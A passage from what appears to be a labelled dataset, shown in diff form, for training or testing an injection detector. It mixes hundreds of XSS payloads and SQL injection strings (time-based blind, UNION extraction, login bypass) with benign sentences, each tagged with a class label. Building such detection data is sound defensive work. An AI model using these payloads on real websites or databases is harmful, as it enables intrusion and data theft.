ns=\""urn&#58;schemas-microsoft-com&#58;time\""&gt;",1,XSS,985 +"select * from users where id = 1 or \<\ union select null,@@VERSION -- 1",2,SQLi,11698 +"1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""akha"" like ""akha",2,SQLi,19488 +"<ol onmouseover=""alert(1)"">test</ol>",1,XSS,2477 +"1"" ) where 2680 = 2680 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13962 +"-3581'|| ( select 'uxmh' from dual where 8954 = 8954 union all select 8954,8954,8954,8954,8954,8954#",2,SQLi,18870 +"<STYLE TYPE=""text/javascript"">javascript:alert(1);</STYLE>",1,XSS,721 +"select * from users where id = 1 -1<@ union select 1,version ( ) -- 1",2,SQLi,11607 +1' ) where 4298 = 4298,2,SQLi,13581 +"<set attributeName=""xlink:href"" begin=""accessKey(b)"" to=""//example.com/?b"" />",1,XSS,9251 +"<progress onmouseleave=""alert(1)"">test</progress>",1,XSS,2858 +1' ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( 'npzh' = 'npzh,2,SQLi,18176 +"<;STYLE>;li {list-style-image: url("";javascript:alert(&#39;XSS&#39;)"";);}<;/STYLE>;<;UL>;<;LI>;XSS",1,XSS,1536 +1'|| ( select 'homm' where 4937 = 4937 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16167 +"-1692' ) union all select 7074,7074,7074,7074,7074,7074,7074#",2,SQLi,18621 +"<listing draggable=""true"" ondragstart=""alert(1)"">test</listing>",1,XSS,8514 +Tim Seymour was a buyer of the Financial Select Sector SPDR.,0,normal,25251 +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?,1,XSS,796 +1 ) ) as emtf where 3561 = 3561 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,18364 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ""%"" = """,2,SQLi,19809 +Select a recipe to experiment with.,0,normal,24024 +"Everlane Women's Cashmere Crew, available in select colors, from $50 Everlane Men's Cashmere Crew, available in select colors, from $70",0,normal,26165 +"select * from users where id = 1 or 1#""; union select null,version ( ) -- 1",2,SQLi,11374 +1' ) and 7290 = 8416 and ( 'ktlz' like 'ktlz,2,SQLi,14252 +select pg_sleep ( 5 ) and ( '%' = ',2,SQLi,15543 +"<;INPUT TYPE="";IMAGE""; SRC="";javascript:alert(';XSS';);"";>;",1,XSS,1528 +<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus>,1,XSS,2217 +"-7738%"" ) union all select 8754,8754,8754,8754,8754,8754,8754,8754,8754#",2,SQLi,13549 +1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'omlt' = 'omlt,2,SQLi,19398 +"<svg onmouseup=""alert(1)"">test</svg>",1,XSS,2874 +"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ""yobb"" like ""yobb",2,SQLi,16622 +"<isindex onclick=""alert(1)"">test</isindex>",1,XSS,8444 +"1"" ) where 4822 = 4822 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,13974 +""" Then tap ""parental controls"" and select ""enable parental controls.",0,normal,26426 +",waitfor delay '0:0:__TIME__'--",2,SQLi,11615 +"<div draggable=""true"" contenteditable>drag me</div><noframes ondrop=alert(1) contenteditable>drop here</noframes>",1,XSS,4540 +Select the right playlist for the party.,0,normal,24141 +-3648' where 4629 = 4629 order by 1--,2,SQLi,22149 +"1%"" ) union all select null,null,null,null,null,null,null,null--",2,SQLi,18610 +%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E,1,XSS,9350 +1 ) as jtfx where 8038 = 8038,2,SQLi,16799 +"<cite onkeypress=""alert(1)"" contenteditable>test</cite>",1,XSS,7918 +") or (1""=""1""--",2,SQLi,9935 +"<data oncut=""alert(1)"" contenteditable>test</data>",1,XSS,4780 +"1"" ) as ranl where 5553 = 5553",2,SQLi,20555 +Select obtain.,0,normal,24526 +"1' and elt ( 4249 = 4249,7259 )",2,SQLi,21232 +"<tr ondblclick=""alert(1)"">test</tr>",1,XSS,4179 "<a href=""javas\x0Acript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,412 -"<textarea onclick=""alert(1)"">test</textarea>",1,XSS,4745 -"-3541"" or make_set ( 9354 = 9354,7185 ) and ""fgxu"" = ""fgxu",2,SQLi,17864 -"<img src=""blah>"" onmouseover=""document.vulnerable=true;"">",1,XSS,1490 -"1"" ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( ""sdps"" = ""sdps",2,SQLi,15429 -Select a shade of lipstick for the evening.,0,normal,24260 -"select * from users where id = 1 <@<@ union select null,version ( ) -- 1",2,SQLi,11802 +"<em onmouseleave=""alert(1)"">test</em>",1,XSS,4529 +"1' ) ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 'qpuy' = 'qpuy",2,SQLi,15292 +OR 1=0,2,SQLi,10093 +Select a destination for the trip.,0,normal,23975 +1' ) as jztg where 1222 = 1222 or sleep ( 5 ) #,2,SQLi,16731 +"<tbody draggable=""true"" ondragenter=""alert(1)"">test</tbody>",1,XSS,1748 +"1'|| ( select 'tdcr' where 6792 = 6792 union all select null,null,null,null,null#",2,SQLi,21010 +1 ) and 9198 = 9198--,2,SQLi,16820 +<caption id=x tabindex=1 onactivate=alert(1)></caption>,1,XSS,5497 +"<dl onmouseout=""alert(1)"">test</dl>",1,XSS,1938 +Expansion of early and late antlerless seasons in select counties.,0,normal,26162 +"1 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,22098 +"<div style=""position:absolute;top:0;left:0;width:100%;height:100%"" onmouseover=""prompt(1)"" onclick=""alert(1)"">x</button>",1,XSS,874 +"-7258"" ) as wjjr where 2110 = 2110 union all select 2110,2110,2110,2110,2110,2110,2110,2110,2110--",2,SQLi,18217 +"-5779 ) union all select 6089,6089--",2,SQLi,20016 +"<STYLE>li {list-style-image: url(\""javascript:alert('XSS')\"");}</STYLE><UL><LI>XSS",1,XSS,1257 +1 ) ) as ztcn where 1043 = 1043 and 6305 = 5785--,2,SQLi,17282 +Current / Elliott 25% off your purchase; select exclusions apply; currentelliott.,0,normal,26215 +Select a fragrance for your sanctuary.,0,normal,24042 +Select the style that works for you and that suits you.,0,normal,25542 +"1"" ) ) as qode where 2398 = 2398 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,17540 +"1'|| ( select 'jzwq' where 3289 = 3289 union all select null,null,null,null,null,null,null#",2,SQLi,19970 +"1 ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,20892 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--",2,SQLi,10671 +Update feed.,0,normal,23014 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--",2,SQLi,10689 +Select the best wedding vows.,0,normal,24345 +"1'|| ( select 'nvrq' from dual where 4337 = 4337 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,20626 +<area onpointerleave=alert(1)>XSS</area>,1,XSS,8874 +Select learn.,0,normal,24677 +"1%' ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,19359 +"1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and 'pbin' = 'pbin",2,SQLi,15222 +1 where 4519 = 4519,2,SQLi,16871 +"They no longer select the chairmen of parliamentary select committees, who are now elected by MPs.",0,normal,25274 +"-6803"" ) order by 1#",2,SQLi,13769 +Filter the spam calls on your phone.,0,normal,22908 +"1%"" rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ""%"" = """,2,SQLi,15591 +"<cite onpaste=""alert(1)"" contenteditable>test</cite>",1,XSS,5848 +Select map.,0,normal,24622 +1' or sleep ( 5 ) and 'rpqn' like 'rpqn,2,SQLi,17599 +"1"" ) ) and elt ( 6553 = 4771,4771 ) and ( ( ""eolu"" = ""eolu",2,SQLi,16304 +<IMG SRC=JaVaScRiPt:alert('')>,1,XSS,2688 +-8187' ) ) ) or 1698 = 2823#,2,SQLi,15054 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--",2,SQLi,10581 +Where's the skate park?,0,normal,23572 +"1', ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4932 = 4932 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) )",2,SQLi,16942 +-9054 ) ) ) or 9323 = 9323#,2,SQLi,21257 +1'|| ( select 'puco' where 2605 = 2605 union all select null#,2,SQLi,21602 +"1%"" ) ) ) and 8438 = 7620--",2,SQLi,19078 +"select * from users where id = 1 or \.<\ union select 1,@@VERSION -- 1",2,SQLi,11960 +"Whether you choose to select the pattern in secret or ask the parents for their preferences, you really can't go wrong!",0,normal,25102 +"1"" ) and 4595 = 4595#",2,SQLi,20326 +"<dialog ondblclick=""alert(1)"">test</dialog>",1,XSS,3423 +)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337,2,SQLi,11118 +"<kbd oncontextmenu=""alert(1)"">test</kbd>",1,XSS,6803 +"<isindex onmouseout=""alert(1)"">test</isindex>",1,XSS,8820 +"-3719"" union all select 6609,6609,6609,6609#",2,SQLi,15598 +"1"" ) ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,21292 +"select * from users where id = 1 or ""$@"" or 1 = 1 -- 1",2,SQLi,11808 +"1, ( case when 8260 = 8260 then 1 else null end )",2,SQLi,14706 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*",2,SQLi,10873 +a' --,2,SQLi,10958 +<svg id=x;onload=alert(1)>,1,XSS,9404 +if ( 4947 = 5350 ) select 4947 else drop function ereg--,2,SQLi,18767 +<button onMouseUp=javascript:alert(1)>,1,XSS,9602 +1 ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 6824 = 6824,2,SQLi,16170 +"-3828%"" ) ) ) or make_set ( 1765 = 8657,8657 ) and ( ( ( ""%"" = """,2,SQLi,12960 +"<blockquote onmouseover=""alert(1)"">test</blockquote>",1,XSS,2226 +"iif ( 9875 = 8961,1,1/0 )",2,SQLi,21174 +"-4452%"" union all select 7141,7141,7141,7141,7141,7141,7141,7141--",2,SQLi,20499 +"<meter oncontextmenu=""alert(1)"">test</meter>",1,XSS,7655 +"-1164"" ) union all select 6617,6617,6617,6617,6617,6617--",2,SQLi,14906 +"1"" ) rlike sleep ( 5 ) #",2,SQLi,19385 +"<content onmouseover=""alert(1)"">test</content>",1,XSS,2500 +<frameset onpointerdown=alert(1)>XSS</frameset>,1,XSS,4192 +<link onpointermove=alert(1)>XSS</link>,1,XSS,6970 +<address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus>,1,XSS,4916 +"1'|| ( select 'xuof' from dual where 8794 = 8794 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15616 +1 ) as itvm where 1482 = 1482,2,SQLi,21192 +<header id=x tabindex=1 onfocusin=alert(1)></header>,1,XSS,4402 +1' ) ) ) and 5615 = 5458--,2,SQLi,13643 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--",2,SQLi,10393 +"<audio id=x controls onfocusin=alert(1) id=x><source src=""validaudio.wav""></audio>",1,XSS,8179 +"1%"" ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16317 +"1%' ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( '%' = '",2,SQLi,16793 +"Containing select cases adjudged in the King's bench, in the reign of K. Charles II.",0,normal,26223 +<area id=x tabindex=1 onbeforeactivate=alert(1)></area>,1,XSS,4551 +"-4925"" union all select 5686,5686,5686,5686,5686,5686,5686#",2,SQLi,12033 +"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>""\>",1,XSS,231 +"1%' ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13199 +But I was always one of a select few black students.,0,normal,26268 +Select your argument.,0,normal,24876 +Where's your SQL know-how?,0,normal,23358 +"<style>:target {transform: rotate(180deg);}</style><s id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></s>",1,XSS,6578 +"-5755"" or 3581 = 7566",2,SQLi,21514 +"<tbody onmouseenter=""alert(1)"">test</tbody>",1,XSS,7540 +<acronym onpointerup=alert(1)>XSS</acronym>,1,XSS,4266 +-4351' ) or 6525 = 9458,2,SQLi,19011 +"<style>:target {color: red;}</style><thead id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></thead>",1,XSS,6317 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--",2,SQLi,10672 +"<q draggable=""true"" ondragend=""alert(1)"">test</q>",1,XSS,3009 +""")) or sleep(__TIME__)=""",2,SQLi,10740 +"<pre draggable=""true"" ondragenter=""alert(1)"">test</pre>",1,XSS,7894 +"1' ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'wzrj' = 'wzrj",2,SQLi,18619 +1 ) as eryo where 2531 = 2531 rlike sleep ( 5 ) --,2,SQLi,17212 +( select ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3287 = 3287 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,22147 +"1%"" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,20388 +select * from users where id = 1 or \.<1 or 1 = 1 -- 1,2,SQLi,11336 +Locate items where needed.,0,normal,23330 +<img src=validimage.png onloadend=alert(1)>,1,XSS,8249 +-2165' where 6593 = 6593 or 9158 = 7254--,2,SQLi,17362 +"><img src=x onerror=javascript:alert('A')> +><img src=x onerror=javascript:alert((""A""))>",1,XSS,1220 +<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus>,1,XSS,3194 +<p onpointerleave=alert(1)>XSS</p>,1,XSS,4014 +) waitfor delay '0:0:20' /*,2,SQLi,10830 +Where's the beauty salon?,0,normal,23607 +<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset>,1,XSS,8613 +"admin"" or ""1"" = ""1""--",2,SQLi,11319 +"-4148%"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""%"" = """,2,SQLi,14225 +"<noframes draggable=""true"" ondrag=""alert(1)"">test</noframes>",1,XSS,6754 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#",2,SQLi,10728 +"?clickTAG=javascript:alert(1)"",",1,XSS,9827 +1' where 8482 = 8482 or sleep ( 5 ) #,2,SQLi,16121 +-4961' ) or 3038 = 3038,2,SQLi,17965 +"<acronym oncut=""alert(1)"" contenteditable>test</acronym>",1,XSS,6463 +"<style>:target {color:red;}</style><aside id=x style=""transition:color 1s"" ontransitionend=alert(1)></aside>",1,XSS,8500 +"<listing onmouseenter=""alert(1)"">test</listing>",1,XSS,8279 +<col id=x tabindex=1 onfocusin=alert(1)></col>,1,XSS,4585 +<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset>,1,XSS,5576 +"Reports to the Postmaster-General upon proposals for transferring to the Post Of f ice the Telegraphs throughout the United Kingdom (1868); Special Reports from Select Committee on the Electric Telegraphs Bills (1868, 1869); Report by Mr Scudamore on the reorganization of the Telegraph system of the United Kingdom (1871); Journ.",0,normal,25711 +"1 ) ) as jzzo where 7773 = 7773 union all select null,null,null,null,null#",2,SQLi,21577 +Extra 10% off select items with code SUPERSAVER (through August 15).,0,normal,26160 +"<style>@keyframes x{}</style><table style=""animation-name:x"" onanimationstart=""alert(1)""></table>",1,XSS,5378 +"-1084' ) union all select 2634,2634,2634,2634,2634,2634,2634,2634#",2,SQLi,20495 +""",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--",2,SQLi,10919 +"1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'edcm' like 'edcm",2,SQLi,15460 +"<colgroup onbeforepaste=""alert(1)"" contenteditable>test</colgroup>",1,XSS,7110 +"<a href=http://foo.bar/#x=`y></a><img alt=""`><img src=xx:x onerror=alert(108)></a>"">",1,XSS,9009 +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>,1,XSS,804 +Select your favorite dishware.,0,normal,24306 +"><script alert(String.fromCharCode(88,83,83))</script> +'>><marquee><h1>XSS</h1></marquee> +'>><script>alert('XSS')</script>",1,XSS,1248 +-8453 ) ) ) or 3038 = 3038,2,SQLi,21072 +Select a topic for the research paper.,0,normal,24135 +<input type=checkbox id=x onfocusin=alert(1)>,1,XSS,7783 +"<fieldset onpaste=""alert(1)"" contenteditable>test</fieldset>",1,XSS,5964 +"<optgroup onkeyup=""alert(1)"" contenteditable>test</optgroup>",1,XSS,5169 +"-1597"" where 5933 = 5933 or 3038 = 3038",2,SQLi,14020 +a' or 'a' = 'a,2,SQLi,10043 +( select 2527 from pg_sleep ( 5 ) ),2,SQLi,16432 +"1%' ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,18335 +<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed>,1,XSS,8362 +1' and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,21463 +"<element onmousedown=""alert(1)"">test</element>",1,XSS,7516 +"-7731"" ) ) or make_set ( 2551 = 4389,4389 ) and ( ( ""unly"" like ""unly",2,SQLi,14496 +<style>@import'http://www.securitycompass.com/xss.css';</style>,1,XSS,1489 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23",2,SQLi,10866 +Select the right path.,0,normal,24419 +select ( case when ( 5796 = 8326 ) then 5796 else 5796* ( select 5796 from information_schema.character_sets ) end ) #,2,SQLi,14810 +"1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( 'skdm' = 'skdm",2,SQLi,15057 +Select the book.,0,normal,22833 +"<noframes onmousedown=""alert(1)"">test</noframes>",1,XSS,6771 +"1'|| ( select 'osty' from dual where 6433 = 6433 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ) ||'",2,SQLi,17184 +&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;,1,XSS,1339 +1%' ) and 2006 = 2006,2,SQLi,19891 +"1%"" ) union all select null,null,null#",2,SQLi,19698 +"-9572%"" ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""%"" = """,2,SQLi,15022 +"<div draggable=""true"" contenteditable>drag me</div><bdi ondrop=alert(1) contenteditable>drop here</bdi>",1,XSS,4476 +"<meta HTTP-EQUIV=""Link"" Content=""<http://www.securitycompass.com/xss.css>; REL=stylesheet"">",1,XSS,1490 +"At the same time, the essence of eclecticism is the refusal to follow blindly one set of formulae and conventions, coupled with a determination to recognize and select from all sources those elements which are good or true in the abstract, or in practical affairs most useful ad hoc. Theoretically, therefore, eclecticism is a perfectly sound method, and the contemptuous significance which the word has acquired is due partly to the fact that many eclectics have been intellectual trimmers, sceptics or dilettanti, and partly to mere partisanship. On the other hand, eclecticism in the sphere of abstract thought is open to this main objection that, in so far as every philosophic system is, at least in theory, an integral whole, the combination of principles from hostile theories must result in an incoherent patchwork.",0,normal,26297 +"1"" ) where 5197 = 5197 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,17977 +"1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) )",2,SQLi,16188 +Please select a song.,0,normal,24302 +1' ) ) as dipp where 1714 = 1714,2,SQLi,22293 +"<plaintext onbeforecut=""alert(1)"" contenteditable>test</plaintext>",1,XSS,2056 +"1' ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,13023 +<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus>,1,XSS,4708 +"<? foo=""><x foo='?><script>alert(91)</script>'>"">",1,XSS,8986 +1'|| ( select 'yuku' where 7480 = 7480,2,SQLi,14234 +"<style>@keyframes slidein {}</style><strong style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></strong>",1,XSS,4773 +"-2876"" ) or make_set ( 5306 = 6127,6127 ) and ( ""urjm"" = ""urjm",2,SQLi,18216 +"-3960"" ) ) union all select 7813,7813,7813,7813,7813,7813--",2,SQLi,21621 +<command id=x tabindex=1 onfocus=alert(1)></command>,1,XSS,3548 +"1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,19822 +sin,0,normal,23179 +"1' ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( 'vxqs' = 'vxqs",2,SQLi,12974 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'pgth' = 'pgth,2,SQLi,13992 +"1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( 'rqyz' = 'rqyz",2,SQLi,13531 +to_timestamp_tz,2,SQLi,22422 +¼script¾alert(¢¢)¼/script¾,1,XSS,8479 +Insert SIM card.,0,normal,22767 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""pdqm"" like ""pdqm",2,SQLi,18693 +<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus>,1,XSS,5235 +"<wbr oncontextmenu=""alert(1)"">test</wbr>",1,XSS,2517 +"iif ( 2976 = 2976,1,1/0 )",2,SQLi,17470 +"1"" ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ""dyoe"" = ""dyoe",2,SQLi,13288 +"1"" and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,20854 +"As any detailed statement of the critical system, however compressed, would be beyond the limits of the present article, it is proposed here to select only the more salient doctrines, and to point out in connexion with them what advance had been effected by Kant, and what remained for subsequent efforts at complete solution of the problems raised by him.",0,normal,26308 +"1"" ) ) ) and elt ( 1750 = 7826,7826 ) and ( ( ( ""qcro"" = ""qcro",2,SQLi,16342 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( 6866 = 6866",2,SQLi,12024 +select ( case when ( 2676 = 4191 ) then 2676 else 1/ ( select 0 ) end ) --,2,SQLi,15343 +"<div id=""84""><x xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"" ev:handler=""javascript:alert(84)//#x""/>//[""'`-->]]>]</div><div id=""85""><x xmlns:ev=""http://www.w3.org/2001/xml-events"" ev:event=""load"" ev:handler=""test.evt#x""/>//[""'`-->]]>]</div><div id=""86""><body oninput=alert(86)><input autofocus>//[""'`-->]]>]</div>",1,XSS,9093 +"<root/>//[""'`-->]]>]</div>",1,XSS,9190 +"select * from users where id = 1 -@<@ union select version ( ) ,version ( ) -- 1",2,SQLi,11801 +"<img draggable=""true"" ondragend=""alert(1)"">test</img>",1,XSS,8483 +"1%"" ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""%"" = """,2,SQLi,19786 +email=' WAITFOR DELAY '0:0:5'--,2,SQLi,11288 +Please select a color scheme.,0,normal,24375 +Let's explore where the city skyline is visible.,0,normal,23733 +"<style>@keyframes x{}</style><nav style=""animation-name:x"" onanimationstart=""alert(1)""></nav>",1,XSS,5803 +-2951 or 4189 = 2291,2,SQLi,15274 +"1%"" ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ( ""%"" = """,2,SQLi,16737 +"<samp onmouseout=""alert(1)"">test</samp>",1,XSS,6945 +"<i onkeyup=""alert(1)"" contenteditable>test</i>",1,XSS,4690 +"1"" ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ""hybu"" like ""hybu",2,SQLi,16325 +<base id=x tabindex=1 onbeforeactivate=alert(1)></base>,1,XSS,7343 +"<frame onmousemove=""alert(1)"">test</frame>",1,XSS,4740 +"<colgroup onclick=""alert(1)"">test</colgroup>",1,XSS,7511 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></cite>",1,XSS,5919 +""" and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,10931 +"<style><img title=""</style><img src onerror=alert(1)>""></style>",1,XSS,112 +1' ) as ibaw where 2130 = 2130 and 9198 = 9198--,2,SQLi,19315 +<input onpointerover=alert(1)>XSS</input>,1,XSS,7232 +They must select now.,0,normal,24230 +"><img src=x onerror=alert('XSS');> +><img src=x onerror=alert(String.fromCharCode(88,83,83));>",1,XSS,9656 +"-8875"" ) where 8428 = 8428 or 1519 = 5756--",2,SQLi,19623 +"<bdi onpaste=""alert(1)"" contenteditable>test</bdi>",1,XSS,5000 +or ''&',2,SQLi,9845 +"1"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ""gvlc"" like ""gvlc",2,SQLi,14898 +"<style>:target {transform: rotate(180deg);}</style><meta id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></meta>",1,XSS,3456 +"-5644"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( ""evcf"" = ""evcf",2,SQLi,13142 +Select your influence.,0,normal,24840 +select case when 1238 = 9044 then 1 else null end--,2,SQLi,17241 +""" ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11932 +"<div draggable=""true"" contenteditable>drag me</div><header ondrop=alert(1) contenteditable>drop here</header>",1,XSS,2360 +<isindex onpointerleave=alert(1)>XSS</isindex>,1,XSS,2857 +1'+ ( select gblp where 6768 = 6768,2,SQLi,18755 +"&lt;IMG SRC=`javascript&#058;alert(\""RSnake says, 'XSS'\"")`&gt;",1,XSS,1058 +"<set attributeName=""xlink:href"" begin=""accessKey(c)"" to=""//example.com/?c"" />",1,XSS,9252 +"-4596"" union all select 5761#",2,SQLi,15406 +Select a color palette for the design.,0,normal,24073 +Join the cycling club.,0,normal,22660 +"&lt;IMG SRC=\""mocha&#58;&#91;code&#93;\""&gt;",1,XSS,946 +"select * from users where id = 1 or ""1]"" or 1 = 1 -- 1",2,SQLi,11572 +"<style>:target {color:red;}</style><blockquote id=x style=""transition:color 1s"" 